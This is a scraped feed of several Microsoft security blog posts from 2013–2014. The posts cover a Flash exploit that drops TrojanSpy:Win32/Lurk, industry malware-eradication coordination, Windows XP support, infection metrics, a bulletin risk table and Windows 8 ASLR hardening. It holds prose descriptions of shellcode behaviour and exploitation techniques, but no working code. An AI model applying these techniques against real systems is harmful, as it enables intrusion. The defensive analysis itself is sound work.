<p>The &ldquo;Shim&rdquo; code calls VirtualProtect() to make the shellcode memory area writable and executable. After the VirtualProtect() call, control is passed to the shellcode. The shellcode is short and pithy &ndash; only 140 bytes (see figure 4).</p> <p>Interestingly, the shellcode doesn&rsquo;t contain the code to resolve the API addresses. 
Instead, the API addresses are resolved by the ActionScript (see figure 5; the placeholders for the API addresses are marked in red).</p> <p>The shellcode simply drops a PE file (already decrypted by the .swf) to the %temp% directory and loads it with a LoadLibrary() call. The dropped PE file (SHA1: 05446C67FF8C0BAFFA969FC5CC4DD62EDCAD46F5) is detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanSpy:Win32/Lurk">TrojanSpy:Win32/Lurk</a>. The telemetry for this file is shown in figure 6.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE4.png"><img style="height:297px;width:500px;" alt="&ldquo;shellcode&rdquo;" src="http://www.microsoft.com/security/portal/blog-images/a/CVE4.png" border="0" /></a></p> <p><em>Figure 4: Short and sweet &ldquo;shellcode&rdquo;</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE5.png"><img alt="ActionScript" src="http://www.microsoft.com/security/portal/blog-images/a/CVE5.png" border="0" /></a></p> <p><em>Figure 5: The ActionScript used to generate the shellcode</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE6.png"><img style="height:303px;width:500px;" alt="TrojanSpy:Win32/Lurk infections" src="http://www.microsoft.com/security/portal/blog-images/a/CVE6.png" border="0" /></a></p> <p><em>Figure 6: TrojanSpy:Win32/Lurk infected machines</em></p> <p>We have received reports that an iframe loading this malicious .swf file has been injected into some clean or benign websites. 
Visiting these websites with an outdated version of Flash Player can lead to a compromise of the machine.</p> <p>If you&#39;re using Flash Player version 11.9.900.117 or earlier, you need to update your Flash Player now to be protected against these attacks.</p> <p><em>Chun Feng</em><br /><em>MMPC</em></p><div style="clear:both;"></div> Coordinated malware eradicationhttp://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspxTue, 28 Jan 2014 07:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:856f599c-7531-4f88-b32b-5dc880a0e891msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx#comments<div class="ExternalClass0D182C4AD1BA4CB28EB2D34D6A3DF12E"> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">Today, as an industry, we are very effective at disrupting malware families, but those disruptions rarely eradicate them. Instead, the malware families linger on, rearing up again and again to wreak havoc on our customers.&nbsp;</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">To change the game, we need to change the way we work.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">It is counterproductive when you think about it. The antimalware ecosystem encompasses many strong groups: security vendors, service providers, CERTs, anti-fraud departments, and law enforcement. Each group uses its own strengths and methods to protect its customers and constituents. Each group is able to claim victory from its efforts, but the malware families retain a significant advantage. No matter how big, the reach of each antimalware ecosystem player only extends so far. As a result, our adversaries need only shift a bit beyond that reach to get back in business. 
For example, let&rsquo;s assume an advertising network identifies and shuts down a click-fraud attack.&nbsp; This is great for the network and its advertisers, but the bad guys need only to pivot and attack another advertising network to remain in business. And this time, maybe the bad guys are more effective, because now they&rsquo;re more educated about the need for resiliency and continuity.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">By not working together, we have yielded our advantage to the malware authors. They can see the reach of our tools, and they can dance away from each of us. While we are disrupting them, we are also making them more resilient and more efficient.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">If we want to fight effectively and protect our customers and constituents, we need to eradicate the malware families. To do this, we must coordinate our collective scope and reach so that the bad guys have no room to dance away. Of course, some coordination already exists within the industry today. Antimalware vendors exchange malware samples, prevalence information, and even clean file metadata. They participate with CERTs, ISPs, and law enforcement in sinkholes and takedowns. 
But it hasn&rsquo;t been enough: a quick glance at the age of the detections that we&rsquo;re still using to find our top malware families shows that we are not&nbsp;eradicating them.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA"><a href="http://www.microsoft.com/security/portal/blog-images/a/Group1a.png"><img class="ms-rtePosition-4" style="height:491px;width:600px;" alt="Graph of malware encounters" src="http://www.microsoft.com/security/portal/blog-images/a/Group1a.png" border="0" /></a></p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA"><em>Figure 1: Malware encounters on Microsoft real-time protection products September 1, 2013 - January&nbsp;25, 2014</em></p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">Getting to a more&nbsp;coordinated eradication effort for each malware family will require much&nbsp;stronger industry partnerships. It also needs new partnerships with financial institutions, payment networks, large internet services, and software bundlers. Each partnership will increase our collective ability to present a unified front, thereby reducing the bad guys&rsquo; ability to evade and profit.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">Tighter coordination is a natural evolution of the malware protection industry, and it is already beginning. For example, when Microsoft teamed up with Europol&rsquo;s European Cybercrime Centre (EC3), the Federal Bureau of Investigation (FBI), a number of ISPs and A10 Networks against the Sirefef/ZeroAccess botnet, the results went far beyond a few days of disruption.&nbsp; Faced with a broadly coordinated action against their IP addresses, Sirefef authors waved the white flag. They are not quite eradicated, but they&rsquo;re certainly heading that way.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">While these efforts are working against malware authors, they are essentially one-offs. 
We have hundreds of active malware families that require eradication, and we need a repeatable model that will scale.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">We have&nbsp;talked about <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx">the scope of Microsoft&rsquo;s customer-focused approach</a>, and how we are sharing malware telemetry information. We want to take it much further.&nbsp;We need to create a structure that makes it easy to coordinate campaigns and share more types of information across the entire antimalware ecosystem.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">The time has come to do this now. We need committed antimalware ecosystem partners to join together in coordinated campaigns to eradicate malware families. Here are some examples of how partners can help with their tools, reach, and scope:</p> <div class="ExternalClass41FA3300299B487FB25C66B049327DFA"> <ul> <li><strong>Security vendors:</strong> By sharing detection methods, malware behavior, and unpacking techniques, vendors can more quickly identify and block the malware families as they appear on network-connected endpoints and servers.</li> <li><strong>Financial institutions, online search, and advertising businesses:</strong> With better fraudulent behavior identification, these organizations can starve malware authors of their ill-gotten gains.</li> <li><strong>CERTs and ISPs:</strong> Armed with vetted lists, CERTs and ISPs can block and take down deployment sites and command and control servers.</li> <li><strong>Law enforcement:</strong> Using correlated evidence, law enforcement can prosecute the people and organizations behind the malware.</li> </ul> </div> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Group2a.png"><img class="ms-rtePosition-4" style="height:336px;width:600px;" alt="Antimalware ecosystem coordinated eradication" src="http://www.microsoft.com/security/portal/blog-images/a/Group2a.png" 
border="0" /></a></p> <p><em>Figure 2: The antimalware ecosystem&rsquo;s coordinated malware eradication</em></p> <p>The challenge is how we can all work together&nbsp;in a way that&rsquo;s efficient and long-lasting. Microsoft is committed to helping drive this industry effort&nbsp;forward. We are beginning by looking at what we can contribute to such a community, and we are asking our antimalware ecosystem partners to do the same.</p> <p>Several industry events are coming up this spring and summer. For example, RSA in San Francisco in February 2014, DCC in Singapore and&nbsp;the&nbsp;PCSL/IEEE Malware Conference in Beijing in March 2014, the May 2014 CARO Workshop in Florida, and the June 2014 FIRST event in Boston. These are great opportunities to hammer out a working framework for making coordinated malware eradication a reality. Microsoft will be hosting discussions at these events to do just that.<span class="ms-rteForeColor-2" style="color:#ff0000;">*</span></p> <p>I look forward to your feedback and ongoing conversations about coordinated malware eradication.</p> <p><em>Dennis Batchelder</em><br /><em>MMPC&nbsp;</em></p> <p><em><span class="ms-rteForeColor-2" style="color:#ff0000;">* </span>To join the discussions at these events, please contact us at <a href="mailto:cme-invite@microsoft.com">cme-invite@microsoft.com</a>.</em></p> </div><div style="clear:both;"></div> Microsoft antimalware support for Windows XPhttp://blogs.technet.com/b/mmpc/archive/2014/01/15/microsoft-antimalware-support-for-windows-xp.aspxWed, 15 Jan 2014 20:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0e545d6d-d0d6-4f9c-839e-62196764acafmsft-mmpc17http://blogs.technet.com/b/mmpc/archive/2014/01/15/microsoft-antimalware-support-for-windows-xp.aspx#comments<div class="ExternalClassE3FCE4E09F5744C8AC952CE7B28FF10F"> <p>Microsoft has announced the Windows XP end of 
support date of April 8, 2014. After this date, Windows XP will no longer be a supported operating system<span style="color:#ff0000;">*</span>. To help organizations complete their migrations, Microsoft will continue to provide updates to our antimalware signatures and engine for Windows XP users through July 14, 2015.</p> <p>This does not affect the end-of-support date of Windows XP, or the supportability of Windows XP for other Microsoft products, which deliver and apply those signatures.</p> <p>For enterprise customers, this applies to System Center Endpoint Protection, Forefront Client Security, Forefront Endpoint Protection and Windows Intune running on Windows XP. For consumers, this applies to Microsoft Security Essentials.</p> <p>Our research shows that the effectiveness of antimalware solutions on out-of-support operating systems is limited. Running a well-protected solution starts with using modern software and hardware designed to help protect against today&rsquo;s threat landscape.</p> <p>Microsoft recommends best practices to protect your PC such as:</p> <ul> <li>Using modern software that has advanced security technologies and is supported with regular security updates</li> <li>Regularly applying security updates for all software installed</li> <li>Running up-to-date anti-virus software.</li> </ul> <p>Our goal is to provide great antimalware solutions for our consumer and business customers. We will continue to work with our customers and partners in doing so, and help our customers complete their migrations as Windows XP end of life approaches.</p> <p><strong><i>MMPC</i></strong></p> <p><i><span style="color:#ff0000;">* </span>We&#39;ve received some inquiries about what &quot;no longer supported operating system&quot; means. 
To clarify, this means that, after April 8, 2014, Windows XP users will no longer receive new security updates, non-security hotfixes, free or paid assisted support options, or online technical content updates from Microsoft.</i></p> <p><em>February 5, 2014: We&rsquo;ve received several inquiries about the difference between security updates and antimalware signatures, as well as the Malicious Software Removal Tool (MSRT) for Windows XP. You can find answers to these questions and more on our <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download?os=winxp&amp;arch=other">Windows XP end of support</a> page.</em></p> </div><div style="clear:both;"></div> Protection metrics – December resultshttp://blogs.technet.com/b/mmpc/archive/2014/01/14/protection-metrics-december-results.aspxWed, 15 Jan 2014 00:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e957b271-8884-4288-beed-a40ffa3fd395msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/01/14/protection-metrics-december-results.aspx#comments<div class="ExternalClass5E4213CAA98A4E27832435EA2E5474C8"> <p>Happy New Year! December 2013 was an exciting month for monitoring <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx">our protection results</a> and watching malware trends. The good news: our customer infection rate for December (0.06 percent) was lower than any other month in 2013 and one third the size of our peak in <a href="http://blogs.technet.com/b/mmpc/archive/2013/11/26/our-protection-metrics-october-results.aspx">October</a>. 
The <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Sefnit">Win32/Sefnit</a> trio mentioned in the October and <a href="http://blogs.technet.com/b/mmpc/archive/2013/12/23/protection-metrics-november-results.aspx">November</a> 2013 results declined even more significantly than last month. Even better, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Sirefef">Win32/Sirefef</a> malware development appears to have stopped after <a href="http://blogs.technet.com/b/microsoft_blog/archive/2013/12/19/zeroaccess-criminals-wave-white-flag-the-impact-of-partnerships-on-cybercrime.aspx">the disruption effort</a> led by the Microsoft Digital Crimes Unit. <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Wysotot">Win32/Wysotot</a> also suffered significant declines. More on these families in the year in review section below.</p> <p>As for our other protection metrics, our performance metrics were consistent, and although incorrect detections remained low, we picked up one more crafted file attack. This was a specially crafted clean file designed to trick antimalware vendors into incorrectly detecting a good program as malicious. This file raised our impact to 0.001 percent (or one in 100,000, in comparison to normal months where the impact is closer to 1 in 1,000,000). Along with improving our own processes to thwart these attack attempts on our systems, Dennis Batchelder and Hong Jia gave a <a href="http://www.virusbtn.com/conference/vb2013/abstracts/LM7-JiaBatchelder.xml">presentation on this attack technique at VirusBulletin</a> to help other vendors (from our data, we could see that there were several vendors who also appeared to be targets) discover and prevent these attacks from affecting customers.</p> <p><strong>Malware infections - Year in review</strong></p> <p>December 2013 was a good end to a tumultuous year. 
Figure 1 shows that although our infection rates rose in the last quarter, primarily due to the Sefnit trio, our overall rates ended the year on a good note with the decline of many malware families. Although fighting malware can often feel like whack-a-mole, seeing major families disappear into oblivion and the overall malware infection rate decline feels like a win for our industry.</p> <p>Figure 2 highlights several major families that, earlier in the year, were contributing significantly to infections affecting Microsoft customers, in addition to the overall infection rate (also shown on our <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection-prev.aspx">protection metrics trend page</a>).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Decmet1.png"><img style="width:500px;" alt="2013 average infection rates" src="http://www.microsoft.com/security/portal/blog-images/a/Decmet1.png" border="0" /></a></p> <p><em>Figure 1: 2013 average daily infection rates</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Decmet2.png"><img style="width:500px;" alt="Malware family contributions to infections - 2013" src="http://www.microsoft.com/security/portal/blog-images/a/Decmet2.png" border="0" /></a></p> <p><em>Figure 2: 2013 malware infections by family</em></p> <p>First, I&#39;ll talk about <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/FakeRean">FakeRean</a>. This family poses as fake security software, which, as a category, took a dive in 2013 as we reported in the last Security Intelligence Report (<a href="http://www.microsoft.com/security/sir/default.aspx">SIRv15</a>). FakeRean practically disappeared by July 2013.</p> <p>Next, the Sefnit trio. 
Sefnit, a family that has been around for some time, made a strong comeback in 2013 and was given a strong assist by several trojans (<a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Rotbrow">Rotbrow</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Brantall">Brantall</a>) used to distribute it. We took the fight to several fronts. One of the methods of distribution for Sefnit is through Tor. <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx">We worked with the Tor project</a> to clean up the clients that were installed by Sefnit, preventing further abuse. We also took out the new distributors &ndash; Rotbrow and Brantall &ndash; reaching out to our MVI and VIA partners to ensure they also detected them. By December 2013, all three were in significant decline, and Sefnit impact is down to a trickle in comparison to the surge we saw in September and October 2013.</p> <p>Wysotot, a new family that emerged late in 2013, hit a few highs in October and November, but slowed per our telemetry in December.</p> <p>Last but not least, Sirefef. This family started becoming very prevalent in 2012. Originally focusing on click fraud and employing techniques that make it very difficult to remove once installed, this threat quickly became a concern. In 2013, we started collaborating with the Digital Crimes Unit to apply some novel disruption techniques to squeeze this malware family out of existence. As figures 2 and 3 show, it worked. 
The malware authors even responded with a somewhat humorous &quot;white flag&quot; in their code and appear to have stopped development of their family altogether.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Decmet3.png"><img style="width:500px;" alt="Sirefef encounter rates" src="http://www.microsoft.com/security/portal/blog-images/a/Decmet3.png" border="0" /></a></p> <p><em>Figure 3: Sirefef encounters for Microsoft real-time protection customers</em></p> <p>Of course these families could make a comeback. We&#39;ll be here waiting for them when they try.</p> <p><em>Holly Stewart</em></p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div> Assessing risk for the January 2014 security updates http://blogs.technet.com/b/srd/archive/2014/01/14/assessing-risk-for-the-january-2014-security-updates.aspxTue, 14 Jan 2014 16:56:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0f25b526-0f45-420d-b246-92aa98c84246SRD Blog Author0<p>Today we released four security bulletins addressing six CVEs. All four bulletins have a maximum severity rating of Important. 
We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max exploitability rating</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-002">MS14-002</a> <p>(NDProxy, a kernel-mode driver)</p> </td> <td>Attacker able to run code at a low privilege level inside an application sandbox exploits this vulnerability to elevate privileges to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to continue seeing Adobe PDF exploits leveraging this vulnerability to elevate privileges outside sandbox.</td> <td>All exploits we have analyzed for this vulnerability attempt to exploit an already-patched Adobe Reader vulnerability, CVE-2013-3346. This Adobe vulnerability was addressed via a September 11, 2013 Adobe security update. 
<p>Addresses vulnerability described by security advisory 2914486.</p> </td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-001">MS14-001</a> <p>(Word)</p> </td> <td>Victim opens malicious Office document.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-003">MS14-003</a> <p>(win32k.sys, a kernel-mode driver)</p> </td> <td>Attacker running code at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-004">MS14-004</a> <p>(Microsoft Dynamics AX)</p> </td> <td>Attacker able to authenticate to Dynamics server could cause denial-of-service condition preventing it from servicing other client requests.</td> <td>Important</td> <td>n/a</td> <td>Denial of service only, not usable for code execution.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC engineering</p><div style="clear:both;"></div> Software defense: mitigating common exploitation techniqueshttp://blogs.technet.com/b/srd/archive/2013/12/11/software-defense-mitigating-common-exploitation-techniques.aspxThu, 12 Dec 2013 00:04:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:93962483-8422-45bb-8ef1-252fe982a260swiat0<p><span style="font-family: Calibri; font-size: small;">In our previous posts in this series, we described various mitigation improvements that attempt to prevent the exploitation of specific classes of memory safety vulnerabilities such as those that involve </span><a 
href="http://blogs.technet.com/b/srd/archive/2013/10/02/software-defense-mitigating-stack-corruption-vulnerabilties.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">stack corruption</span></a><span style="font-family: Calibri; font-size: small;">, </span><a href="http://blogs.technet.com/b/srd/archive/2013/10/29/software-defense-mitigation-heap-corruption-vulnerabilities.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">heap corruption</span></a><span style="font-family: Calibri; font-size: small;">, and </span><a href="http://blogs.technet.com/b/srd/archive/2013/11/06/software-defense-safe-unlinking-and-reference-count-hardening.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">unsafe list management and reference count mismanagement</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. These mitigations are typically associated with a specific developer mistake such as writing beyond the bounds of a stack or heap buffer, failing to correctly track reference counts, and so on. As a result, these mitigations generally attempt to detect side-effects of such mistakes before an attacker can get further along in the exploitation process, e.g. before they gain control of the instruction pointer. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Another approach to mitigating exploitation is to focus on breaking techniques that can apply to many different classes of memory safety vulnerabilities. These mitigations can have a broader impact because they apply to techniques that are used further along in the process of exploiting many vulnerabilities. For example, once an attacker has gained control of the instruction pointer through an arbitrary vulnerability, they will inherently need to know the address of useful executable code to set it to. 
This is where well-known mitigations like Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) come into play &ndash; both of which have been supported on Windows for many releases now. When combined, these mitigations have proven that they can make it very difficult to exploit many classes of memory safety vulnerabilities even when an attacker has gained control of the instruction pointer.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">In recent years, attackers have been increasingly forced to adapt to exploiting vulnerabilities in applications that make use of a broad range of mitigations, including DEP and ASLR. As our </span><a href="http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">previous blog post explains</span></a><span style="font-size: small;"><span style="font-family: Calibri;">, there are scenarios where both DEP and ASLR can be bypassed, and it is no surprise that attackers have been increasingly focused on improving their ability to do so. Likewise, attackers have placed greater interest on finding classes of vulnerabilities, such as use after free issues, that can grant them more flexibility when attempting to develop an exploit. In light of these trends, we focused a significant amount of attention in Windows 8 and Windows 8.1 on improving the robustness of mitigations that break exploitation techniques that apply to many classes of vulnerabilities. 
In particular, this blog post will cover some of the noteworthy improvements that have been made to ASLR, such as eliminating predictable address space mappings, increasing the amount of entropy that exists in the address space, and making it more difficult to disclose address space information where possible.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Force ASLR</span></span></h1> <p><span style="font-family: Calibri; font-size: small;">For compatibility reasons, executable images (DLLs/EXEs) must indicate their desire to be randomized by ASLR through the </span><a href="http://msdn.microsoft.com/en-us/library/bb384887.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">/DYNAMICBASE flag</span></a><span style="font-family: Calibri; font-size: small;"> provided by the Visual C++ linker.&nbsp; If an executable image has not been linked with /DYNAMICBASE, the Windows kernel will attempt to load the image at its preferred base address.&nbsp; This can cause the executable to reliably load at a predictable location in memory.&nbsp; While this limitation of ASLR on Windows is by design, real-world exploits for software vulnerabilities have become </span><a href="http://www.microsoft.com/en-us/download/details.aspx?id=39680"><span style="color: #0563c1; font-family: Calibri; font-size: small;">increasingly reliant</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> on executable images that have not enabled support for ASLR.&nbsp; </span></span></p> <p><span style="font-family: Calibri; font-size: small;">To generically mitigate this issue, an application running on Windows 8 (or Windows 7 with </span><a href="http://support.microsoft.com/kb/2639308"><span style="color: #0563c1; font-family: Calibri; font-size: small;">KB 2639308</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> installed) can elect to enable a security feature known as 
<em>Force ASLR</em>.&nbsp; When enabled, this feature forces all relocatable images to be randomized when they are loaded by the application, including those images which have not been linked with /DYNAMICBASE.&nbsp; This is designed to prevent executable images from being loaded at a predictable location in memory.&nbsp; If desired, an application can also elect to prevent non-relocatable images from being loaded.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the Force ASLR feature will cause executable images to be randomized that have not enabled support for ASLR, there is a risk that a compatibility problem may be encountered.&nbsp; In addition, the method used to forcibly relocate executable images that have not been built with /DYNAMICBASE can have a performance impact due to decreased page sharing. This is because Force ASLR essentially mimics the behavior of a base address collision and thus may incur a memory cost due to copy-on-write. As such, the Force ASLR feature is not enabled by default for applications running on Windows 8.&nbsp; Instead, applications must explicitly enable this feature.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">The Force ASLR feature has been enabled by default for critical applications such as Internet Explorer 10+, Microsoft Office 2013, and Windows Store applications.&nbsp; This means an attacker attempting to exploit vulnerabilities accessible through these applications will not be able to rely on non-randomized executable images. 
For example, our </span><a href="http://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">recent security update to enable ASLR for HXDS.DLL</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> would not appreciably impact the security posture of applications that enable Force ASLR because this non-ASLR DLL would already get randomized. Going forward, attackers will most likely need to rely on a vulnerability-specific address space information disclosure when exploiting applications that completely enable ASLR or that make use of Force ASLR. </span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Bottom-up and Top-down Randomization</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">Virtual memory allocations that are made by an application can have their base address assigned in one of three ways: bottom-up, top-down, or based.&nbsp; The bottom-up method searches for a free region starting from the bottom of the address space (e.g. VirtualAlloc default), the top-down method searches starting from the top of the address space (e.g. VirtualAlloc with MEM_TOP_DOWN), and the based method attempts to allocate memory at a supplied base address (e.g. 
VirtualAlloc with an explicit base).&nbsp; In practice, the majority of the memory that is allocated by an application will use the bottom-up allocation method, and it is rare to see applications use the based method for allocating memory.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Prior to Windows 8, bottom-up and top-down allocations were not randomized by ASLR.&nbsp; This meant that allocations made through functions like VirtualAlloc and MapViewOfFile had no entropy and could therefore be placed at a predictable location in memory (barring non-deterministic application behavior).&nbsp; While certain memory regions had their own base randomization, such as heaps, stacks, TEBs, and PEBs, all other bottom-up and top-down allocations were not randomized.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Starting with Windows 8, the base address of all bottom-up and top-down allocations is explicitly randomized.&nbsp; This is accomplished by randomizing the address that bottom-up and top-down allocations start from for a given process.&nbsp; In this way, fragmentation within the address space is minimized while also realizing the benefits of randomizing the base address of all memory allocations that are not explicitly based.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">For compatibility reasons, applications must indicate that they support bottom-up and top-down randomization.&nbsp; An application can do this by linking their EXE with /DYNAMICBASE.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Randomization</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">One of the major differences between 64-bit and 32-bit applications on Windows is the size of the virtual address space that is made available to a process.&nbsp; 64-bit applications 
whose EXE is linked with the /LARGEADDRESSAWARE flag receive 8 TB in Windows 8 (128 TB in Windows 8.1) of virtual address space whereas 32-bit applications only receive 2 GB by default.&nbsp; The limited amount of address space available to 32-bit applications places practical constraints on the amount of entropy that can be applied by ASLR when randomizing the location of memory mappings.&nbsp; Since 64-bit applications do not suffer from these limitations by default, it is possible to significantly increase the amount of entropy that is used by ASLR.&nbsp; The ASLR implementation in Windows 8 takes full advantage of this opportunity by enabling high degrees of entropy for 64-bit applications.&nbsp; Providing higher degrees of entropy can further decrease the reliability of exploits written by an attacker and also makes it less likely that an attacker will be able to correctly guess or brute force an address.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Bottom-up Randomization</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">This feature introduces 1 TB of variance into the address that bottom-up allocations start from.&nbsp; This equates to 24 bits of entropy, or a 1 in 16,777,216 chance of guessing the start address correctly.&nbsp; Since heaps, stacks, and most other memory regions are allocated bottom-up, this has the effect of making traditional address space spraying attacks impractical (such as heap and JIT spraying).&nbsp; This is because systems today do not have enough memory available to spray the amount that would be needed to achieve even small degrees of reliability.&nbsp; In addition, executable images that are randomized by the Force ASLR feature receive high degrees of entropy as a result of the high entropy bottom-up randomization feature being enabled for an application. 
As a result, exploits for vulnerabilities in 64-bit applications that rely on address space spraying will first need to disclose the address of at least one bottom-up allocation in order to determine where data may have been placed relative to that address.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">For compatibility reasons, this feature is disabled by default and must be enabled on a per-application basis.&nbsp; This is because some 64-bit applications have latent pointer truncation issues that can surface when dealing with pointers above 4 GB (significant bits set beyond bit 31).&nbsp; 64-bit applications that enable this feature are guaranteed to receive memory addresses that are above 4 GB when allocating bottom-up memory (unless insufficient address space exists above 4 GB).&nbsp; 64-bit applications can enable support for this feature by linking their EXE with the </span><a href="http://msdn.microsoft.com/en-us/library/vstudio/jj835761.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">/HIGHENTROPYVA linker flag</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> provided by Visual Studio 2012. 
This flag is enabled by default for native applications when building with Visual Studio 2012 and beyond.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Top-down Randomization</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">This feature introduces 8 GB of variance into the address that top-down allocations start from.&nbsp; This equates to 17 bits of entropy, or a 1 in 131,072 chance of guessing the start address correctly.&nbsp; 64-bit processes automatically receive high degrees of entropy for top-down allocations if top-down randomization has been enabled (which is controlled by whether the EXE was linked with /DYNAMICBASE).</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Image Randomization</span></span></span></h2> <p><span style="font-family: Calibri;"><span style="font-size: small;">Prior to Windows 8, 64-bit executable images received the same amount of entropy that was used when randomizing 32-bit executable images (8 bits, or 1 in 256 chance of guessing correctly).&nbsp; The amount of entropy applied to 64-bit images has been significantly increased in most cases starting with Windows 8:</span></span></p> <ul> <li><span style="font-family: Calibri;"><span style="font-size: small;">DLL images based above 4 GB: 19 bits of entropy (1 in 524,288 chance of guessing correctly)</span></span></li> <li><span style="font-family: Calibri;"><span style="font-size: small;">DLL images based below 4 GB: 14 bits of entropy (1 in 16,384 chance of guessing correctly).&nbsp; </span></span></li> <li><span style="font-family: Calibri;"><span style="font-size: small;">EXE images based above 4 GB: 17 bits of entropy (1 in 131,072 chance of guessing correctly).</span></span></li> <li><span style="font-size: small;"><span style="font-family: 
